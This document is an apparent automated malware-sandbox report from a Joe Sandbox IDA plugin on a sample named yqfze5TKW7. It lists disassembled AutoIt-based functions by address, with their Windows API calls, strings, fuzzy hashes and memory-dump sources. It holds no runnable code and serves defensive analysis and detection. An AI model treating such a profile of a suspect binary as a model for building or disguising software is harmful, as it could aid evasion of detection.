Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: b3ab968118f38beca612179d7cede97567ced46a3238ecb5773de6d99a5341e2
Instruction ID: f23764b3cf9f5517e087d6828e1e62b892ca5e54a83281f393cf51e02c95bcd7
Opcode Fuzzy Hash: b3ab968118f38beca612179d7cede97567ced46a3238ecb5773de6d99a5341e2
Instruction Fuzzy Hash: 96917071408301FFD710AFA4DC08A5BBBAAFF4A321F105B2AF5A2961A1D771E945CF52

Function 00622C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00622CA2
DeleteObject.GDI32(00000000), ref: 00622CE8
DeleteObject.GDI32(00000000), ref: 00622CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00622CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00622D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0065C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0065C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0065C89D

Part of subcall function 00621B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00622036,?,00000000,?,?,?,?,006216CB,00000000,?), ref: 00621B9A

SendMessageW.USER32(?,00001053), ref: 0065C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0065C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0065C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0065C912

Strings

0, xrefs: 0065C731

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 0feceee2dcc59b65947d43fd7c6d12c72be672e4402d8183033fb91d276785bc
Instruction ID: fb8bed1d88634db4297004e43f6ab22a95e9bd1314a3a468b9bf00a63cf0fdcf
Opcode Fuzzy Hash: 0feceee2dcc59b65947d43fd7c6d12c72be672e4402d8183033fb91d276785bc
Instruction Fuzzy Hash: C812AC30604612EFDB60DF24D894BA9BBE2FF49322F544569F885CB262C731E856CF91

Function 006974AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 006974DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0069759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006975DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006975ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00697633
GetClientRect.USER32(00000000,?), ref: 0069763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00697683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00697692
GetStockObject.GDI32(00000011), ref: 006976A2
SelectObject.GDI32(00000000,00000000), ref: 006976A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006976B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006976BF
DeleteDC.GDI32(00000000), ref: 006976C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006976F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0069770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00697746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0069775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0069776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0069779B
GetStockObject.GDI32(00000011), ref: 006977A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006977B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006977BB

Strings

msctls_progress32, xrefs: 0069773C
AutoIt v3, xrefs: 0069762B
static, xrefs: 0069767D, 00697795
DISPLAY, xrefs: 00697688

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 19ffff3fcf1b97e8ac3209f69c043bec87dc6fa7cc70e8ba10d97261b5ac7602
Instruction ID: c9a29dde4e20d629e8c93f17b6935313d32397c465764cbe87f317a7e2ef30de
Opcode Fuzzy Hash: 19ffff3fcf1b97e8ac3209f69c043bec87dc6fa7cc70e8ba10d97261b5ac7602
Instruction Fuzzy Hash: F4A15E71A40615BFEB14DBA4DC4AFAE7BBAEB49715F004118FA15AB2E0D670AD00CF64

Function 0068AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068AD1E
GetDriveTypeW.KERNEL32(?,006AFAC0,?,\\.\,006AF910), ref: 0068ADFB
SetErrorMode.KERNEL32(00000000,006AFAC0,?,\\.\,006AF910), ref: 0068AF59

Strings

\\.\, xrefs: 0068AD70
1394, xrefs: 0068AEDB
ATA, xrefs: 0068AED4
iSCSI, xrefs: 0068AEFE
SSA, xrefs: 0068AEE2
Virtual, xrefs: 0068AF21
RAID, xrefs: 0068AEF7
Network, xrefs: 0068AE39
SAS, xrefs: 0068AF05
Fibre, xrefs: 0068AEE9
SSD, xrefs: 0068AE86
SCSI, xrefs: 0068AEC6
RAMDisk, xrefs: 0068AE25
Fixed, xrefs: 0068AE43
USB, xrefs: 0068AEF0
PhysicalDrive, xrefs: 0068ADA7
Removable, xrefs: 0068AE4D
ATAPI, xrefs: 0068AECD
FileBackedVirtual, xrefs: 0068AF28
MMC, xrefs: 0068AF1A
CDROM, xrefs: 0068AE2F
Unknown, xrefs: 0068AE1B, 0068AEBF
SATA, xrefs: 0068AF0C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 76977e277ebc635bb99dead4cb7169a3fac7226bb4d4aeb4abcd00a5dbe151b4
Instruction ID: 4db30f8118a08d0094832abfb2da2c5d59eabc5e11e2e202d721480d656a9c91
Opcode Fuzzy Hash: 76977e277ebc635bb99dead4cb7169a3fac7226bb4d4aeb4abcd00a5dbe151b4
Instruction Fuzzy Hash: AC51B1B0A44605AF9B50FF90C986CBD73A3EB4C700B25465BED07AB391DA719D02EB53

Function 006268DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00626931
__wcsnicmp.LIBCMT ref: 00626949
__wcsnicmp.LIBCMT ref: 00626961
__wcsnicmp.LIBCMT ref: 00626979
__wcsnicmp.LIBCMT ref: 00626991
__wcsnicmp.LIBCMT ref: 006269A9
__wcsnicmp.LIBCMT ref: 006269C1
__wcsnicmp.LIBCMT ref: 006269D5
__wcsnicmp.LIBCMT ref: 00626A16
__wcsnicmp.LIBCMT ref: 00626A2A
__wcsnicmp.LIBCMT ref: 00626A3E
__wcsnicmp.LIBCMT ref: 00626A52

Strings

#pragma compile, xrefs: 0062692B
Unterminated group of comments, xrefs: 0065E403
Cannot parse #include, xrefs: 0065E3F0
#requireadmin, xrefs: 0062695B
#comments-end, xrefs: 00626A38
#notrayicon, xrefs: 00626943
Bad directive syntax error, xrefs: 0065E31A
#include, xrefs: 006269A3
#cs, xrefs: 006269CF, 00626A24
#ce, xrefs: 00626A4C
#include-once, xrefs: 0062698B
#OnAutoItStartRegister, xrefs: 00626973
#comments-start, xrefs: 006269BB, 00626A10

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: e8bb9116cc22f594e772f876a81e6753d6e62a660ccd71728c3e75a4853f01ec
Instruction ID: a1a99d8907e0e2c795ef42a2b2a0b331e7e6c08474aeb5acbd5337d3d8825167
Opcode Fuzzy Hash: e8bb9116cc22f594e772f876a81e6753d6e62a660ccd71728c3e75a4853f01ec
Instruction Fuzzy Hash: F8812CB16006266ACF25AB60EC43FEF37ABAF05700F044029FD456A295EB71DE45CB59

Function 006A9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 006A9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 006A9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 006A9BA7

Strings

0, xrefs: 006A9BE4

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: ad3c80bef6cd1fc1443d10adb9f2aa286e5ed8d25cf833ead0ab95365cfd1d0f
Instruction ID: 96d2f2fff966246f0c7f69a904baba3af1d35f6a0dff38798cb673e10814b9ac
Opcode Fuzzy Hash: ad3c80bef6cd1fc1443d10adb9f2aa286e5ed8d25cf833ead0ab95365cfd1d0f
Instruction Fuzzy Hash: C602AE30104341AFDB25EF24C849BAABBE6FF86314F24852DF995962A1C735DD44CF62

Function 006AA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 006AA903
SetTextColor.GDI32(?,?), ref: 006AA907
GetSysColorBrush.USER32(0000000F), ref: 006AA91D
GetSysColor.USER32(0000000F), ref: 006AA928
CreateSolidBrush.GDI32(?), ref: 006AA92D
GetSysColor.USER32(00000011), ref: 006AA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 006AA953
SelectObject.GDI32(?,00000000), ref: 006AA964
SetBkColor.GDI32(?,00000000), ref: 006AA96D
SelectObject.GDI32(?,?), ref: 006AA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 006AA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006AA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 006AA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006AA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006AAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 006AAA32
DrawFocusRect.USER32(?,?), ref: 006AAA3D
GetSysColor.USER32(00000011), ref: 006AAA4B
SetTextColor.GDI32(?,00000000), ref: 006AAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006AAA67
SelectObject.GDI32(?,006AA5FA), ref: 006AAA7E
DeleteObject.GDI32(?), ref: 006AAA89
SelectObject.GDI32(?,?), ref: 006AAA8F
DeleteObject.GDI32(?), ref: 006AAA94
SetTextColor.GDI32(?,?), ref: 006AAA9A
SetBkColor.GDI32(?,?), ref: 006AAAA4

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 7249216f30058a979e34e4c7e34d6ae4e858ccb06c95869306dfec05459034b5
Instruction ID: 82c39e945a2e36da0e430cd83a483ea1c1611188acd0a36be5fb7a28302ffec8
Opcode Fuzzy Hash: 7249216f30058a979e34e4c7e34d6ae4e858ccb06c95869306dfec05459034b5
Instruction Fuzzy Hash: 87513071900208EFDB11AFE4DC48EAEBB7AEF0A320F115265F911AB2A1D771AD40DF51

Function 006A89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006A8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006A8AD2
CharNextW.USER32(0000014E), ref: 006A8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006A8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006A8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006A8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006A8B86
SetWindowTextW.USER32(?,0000014E), ref: 006A8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006A8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 006A8C1F
_memset.LIBCMT ref: 006A8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006A8C8D
_memset.LIBCMT ref: 006A8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 006A8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 006A8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 006A8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 006A8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006A8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006A8EB4
DrawMenuBar.USER32(?), ref: 006A8EC3
SetWindowTextW.USER32(?,0000014E), ref: 006A8EEB

Strings

0, xrefs: 006A8E55

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: fadc6fe6dcd4d3122648f76212b85ee0474293b064e23da9bd24389ec6786ba3
Instruction ID: 467aed74efcb81603170aa39083589a08d23795f61f3b1a023fc8b08d03a4088
Opcode Fuzzy Hash: fadc6fe6dcd4d3122648f76212b85ee0474293b064e23da9bd24389ec6786ba3
Instruction Fuzzy Hash: 70E16170900219AFDF20AF50CC84EEE7BBAEF06750F14815AFA15AB291DB749D81DF61

Function 006A488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006A49CA
GetDesktopWindow.USER32 ref: 006A49DF
GetWindowRect.USER32(00000000), ref: 006A49E6
GetWindowLongW.USER32(?,000000F0), ref: 006A4A48
DestroyWindow.USER32(?), ref: 006A4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006A4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006A4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006A4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 006A4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006A4B09
IsWindowVisible.USER32(?), ref: 006A4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006A4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006A4B58
GetWindowRect.USER32(?,?), ref: 006A4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 006A4B96
GetMonitorInfoW.USER32(00000000,?), ref: 006A4BB0
CopyRect.USER32(?,?), ref: 006A4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 006A4C32

Strings

tooltips_class32, xrefs: 006A4A96
(, xrefs: 006A4BA3
0, xrefs: 006A4975

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 615a86b8947bd169e05cbb9585476da8ad9a93e4f1b46e9333fb1388070903cc
Instruction ID: 3e5981633b71534fafc84400f3196eeb5678792d2c89a9280e43ce9aa9886be9
Opcode Fuzzy Hash: 615a86b8947bd169e05cbb9585476da8ad9a93e4f1b46e9333fb1388070903cc
Instruction Fuzzy Hash: 80B17A71604350AFDB44EF64D844B5ABBE6AF86310F00891CF5999B291DBB1EC05CFA6

Function 0068449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006844AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006844D2
_wcscpy.LIBCMT ref: 00684500
_wcscmp.LIBCMT ref: 0068450B
_wcscat.LIBCMT ref: 00684521
_wcsstr.LIBCMT ref: 0068452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00684548
_wcscat.LIBCMT ref: 00684591
_wcscat.LIBCMT ref: 00684598
_wcsncpy.LIBCMT ref: 006845C3

Strings

DefaultLangCodepage, xrefs: 006845AB
\VarFileInfo\Translation, xrefs: 00684540
%u.%u.%u.%u, xrefs: 00684626
04090000, xrefs: 0068457E
StringFileInfo\, xrefs: 0068451B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: e0681a9c77bbf417447c4a1258d655f91dbe374185cbacd783dbafd9c3781689
Instruction ID: b942395c2ad7e58e33ca2b7e296a39ad085c2c524f0398975c6e36914ae205ba
Opcode Fuzzy Hash: e0681a9c77bbf417447c4a1258d655f91dbe374185cbacd783dbafd9c3781689
Instruction Fuzzy Hash: CB41C871A002127BD750BBB49C47EFF776EDF42710F14015EF905E6282EE34AA1196AA

Function 006227D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006228BC
GetSystemMetrics.USER32(00000007), ref: 006228C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006228EF
GetSystemMetrics.USER32(00000008), ref: 006228F7
GetSystemMetrics.USER32(00000004), ref: 0062291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00622939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00622949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0062297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00622990
GetClientRect.USER32(00000000,000000FF), ref: 006229AE
GetStockObject.GDI32(00000011), ref: 006229CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 006229D5

Part of subcall function 00622344: GetCursorPos.USER32(?), ref: 00622357
Part of subcall function 00622344: ScreenToClient.USER32(006E57B0,?), ref: 00622374
Part of subcall function 00622344: GetAsyncKeyState.USER32(00000001), ref: 00622399
Part of subcall function 00622344: GetAsyncKeyState.USER32(00000002), ref: 006223A7

SetTimer.USER32(00000000,00000000,00000028,00621256), ref: 006229FC

Strings

AutoIt v3 GUI, xrefs: 00622974

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d43630878d440344e9b683e316f5351cba4a328eeb9772af7029f74e5220d8f9
Instruction ID: 590a511960ab54f338e589d5112535577d7c7214f7ae2098cc69c920a5a418cb
Opcode Fuzzy Hash: d43630878d440344e9b683e316f5351cba4a328eeb9772af7029f74e5220d8f9
Instruction Fuzzy Hash: ECB1AF70A0061AEFDB14DFA8DC95BEE7BB6FB08315F104229FA15A6290DB74E841CF51

Function 0067A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0067A47A
__swprintf.LIBCMT ref: 0067A51B
_wcscmp.LIBCMT ref: 0067A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0067A583
_wcscmp.LIBCMT ref: 0067A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0067A5F6
GetDlgCtrlID.USER32(?), ref: 0067A648
GetWindowRect.USER32(?,?), ref: 0067A67E
GetParent.USER32(?), ref: 0067A69C
ScreenToClient.USER32(00000000), ref: 0067A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0067A71D
_wcscmp.LIBCMT ref: 0067A731
GetWindowTextW.USER32(?,?,00000400), ref: 0067A757
_wcscmp.LIBCMT ref: 0067A76B

Part of subcall function 0064362C: _iswctype.LIBCMT ref: 00643634

Strings

%s%u, xrefs: 0067A515

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: f5b90d1187fcfdea7f7cb218863ebf5154330b6a8d14a0e15398ac69adeee4a0
Instruction ID: 736e51a0c3d46a723319f2688f21a15df9113ceff062f71192e7921f35966dba
Opcode Fuzzy Hash: f5b90d1187fcfdea7f7cb218863ebf5154330b6a8d14a0e15398ac69adeee4a0
Instruction Fuzzy Hash: DDA1B135204606AFD718DFA4C884BEEB7EAFF84315F108629F99DC2250DB30E955CB92

